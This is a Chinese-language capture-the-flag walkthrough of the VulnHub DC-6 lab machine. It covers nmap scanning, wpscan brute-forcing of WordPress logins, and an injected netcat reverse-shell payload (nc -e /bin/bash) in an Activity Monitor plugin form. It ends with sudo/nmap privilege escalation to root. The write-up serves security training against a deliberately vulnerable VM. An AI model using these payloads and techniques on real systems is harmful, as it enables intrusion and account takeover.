DC 系列第六題 DC: 6,這題比較偏向以前解過的 DC: 2,一樣環境都是 WordPress,透過相同手法破密,唯一花費比較久的只有爆破密碼的時間,因為忽略出題者給的提示導致爆破時間過長,一度還以為絲路錯了,該題的整體難度並不算太高,還是或多或少有些許收穫。
目錄
環境設定
VirtualBox: Kali & DC: 6
Net Config: NAT Network
尋找靶機
$ nmap 10.0.2.1/24 -sP
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-08 10:23 CST
Nmap scan report for 10.0.2.1
Host is up (0.040s latency).
Nmap scan report for 10.0.2.2
Host is up (0.0017s latency).
Nmap scan report for 10.0.2.15
Host is up (0.00020s latency).
Nmap scan report for 10.0.2.17
Host is up (0.0020s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.40 seconds
$ nmap 10.0.2.17 -p- -A
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-08 10:24 CST
Nmap scan report for 10.0.2.17
Host is up (0.0012s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
| 256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_ 256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to http://wordy/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.95 seconds
解題過程
這題與 DC: 2 一樣,需要手動設置 Hosts,編輯 /etc/hosts
並設置,接著就可以瀏覽到目標頁面了。
sudo vim /etc/hosts
10.0.2.17 wordy
wpscan
一樣是個 WordPress,直接使用 wpscan 列舉資訊,其中發現不少使用者並且 xmlrpc 是開啟的。
[+] XML-RPC seems to be enabled: http://wordy/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[i] User(s) Identified:
[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] sarah
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] graham
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] mark
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] jens
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
套路與 DC: 2 一樣,嘗試每個都用爆爆看,也使用 cewl 嘗試抓取頁面上的英文單字當密碼爆破未果,另外使用 rockyou.txt 幾乎每個跑個 10 分鐘我就放棄了。
沒了線索不斷碰壁,盯著頁面發呆、懷疑人生好幾個小時,直到我重新回到 VulnHub DC: 6 的下載頁面發現…
居然還有 CLUE
這東西,只顧著將靶機載下來,沒想到還藏提示在上面,也就是說密碼確定得要用爆破的。
Create User List File
cat << EOF > dc6_username_list.txt
admin
graham
mark
sarah
jens
EOF
Create Password List File
cat /usr/share/wordlists/rockyou.txt | grep k01 > dc6_password_list.txt
Brute-Force to Login
成功爆出一組密碼 mark::helpdesk01
並登入成功。
$ ./wpscan --url http://wordy/ -U dc6_username_list.txt -P dc6_password_list.txt --max-threads 30
[+] Performing password attack on Xmlrpc against 5 user/s
[SUCCESS] - mark / helpdesk01
Trying sarah / $k011 Time: 00:07:14 <=================================================================== > (12550 / 15218) 82.46%
Get Shell
登入成功後簡單探勘,發現 Plugin 「Activity monitor」可能含有 RCE 弱點,並且 PoC 也不複雜。
PoC
cat << EOF >> dc6_am_poc.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools" method="POST" enctype="multipart/form-data">
<input type="hidden" name="ip" value="| nc -nlvp 10.0.2.15 8888 -e /bin/bash" />
<input type="hidden" name="lookup" value="Lookup" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
EOF
Listen
nc -nl -vv -p 8888
Victim
python -c "import pty;pty.spawn('/bin/bash')"
Get other user
在 home/mark 目錄底下發現有個 stuff 資料夾,資料夾內的 things-to-do.txt 則存放一組 graham 的帳號密碼,藉此用來登入 SSH。
www-data@dc-6:/home$ cd /home/mark
www-data@dc-6:/home/mark$ ls
stuff
www-data@dc-6:/home/mark$ file stuff
www-data@dc-6:/home/mark$ cd stuff
www-data@dc-6:/home/mark/stuff$ ls
things-to-do.txt
www-data@dc-6:/home/mark/stuff$ cat things-to-do.txt
cat things-to-do.txt
Things to do:
- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
www-data@dc-6:/home/mark/stuff$
Get Shell via SSH
取得 SSH 登入權限之後,使用 sudo -l 獲得了一些資訊,其中最關鍵的地方在於 (jens) NOPASSWD: /home/jens/backups.sh
,可以解讀為,使用 jens 身分執行 backups.sh 且不需要輸入密碼。
graham@dc-6:~$ sudo -l
Matching Defaults entries for graham on dc-6:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User graham may run the following commands on dc-6:
(jens) NOPASSWD: /home/jens/backups.sh
檢查 /home/jens/backups.sh 的內容,是把 /var/www/html 底下的內容壓縮為 backups.tar.gz。
#!/bin/bash
tar -czf backups.tar.gz /var/www/html
Privilege Escalation
藉由修改 backups.sh 來利用 jens 身分操作,將腳本內容改為:
#!/bin/bash
sudo -l
執行後可以得到:
graham@dc-6:/home/jens$ sudo -u jens ./backups.sh
Matching Defaults entries for jens on dc-6:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jens may run the following commands on dc-6:
(root) NOPASSWD: /usr/bin/nmap
使用者 jens 可以利用 sudo 來執行 nmap 且不需要密碼,至於 nmap 如何取得 shell 呢?可以參考 GTFOBins,裡頭包含常見的 Linux 取得 Shell 的各種方法。
將 backups.sh 改寫如下:
#!/bin/bash
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF
執行該腳本 sudo -u jens ./backups.sh
直接取得 root 權限。
graham@dc-6:/home/jens$ sudo -u jens ./backups.sh
Starting Nmap 7.40 ( https://nmap.org ) at 2021-02-08 21:09 AEST
NSE: Warning: Loading '/tmp/tmp.Gin4myBpdU' -- the recommended file extension is '.nse'.
# root
# # theflag.txt
#
Yb dP 888888 88 88 8888b. dP"Yb 88b 88 888888 d8b
Yb db dP 88__ 88 88 8I Yb dP Yb 88Yb88 88__ Y8P
YbdPYbdP 88"" 88 .o 88 .o 8I dY Yb dP 88 Y88 88"" `"'
YP YP 888888 88ood8 88ood8 8888Y" YbodP 88 Y8 888888 (8)
Congratulations!!!
Hope you enjoyed DC-6. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.
#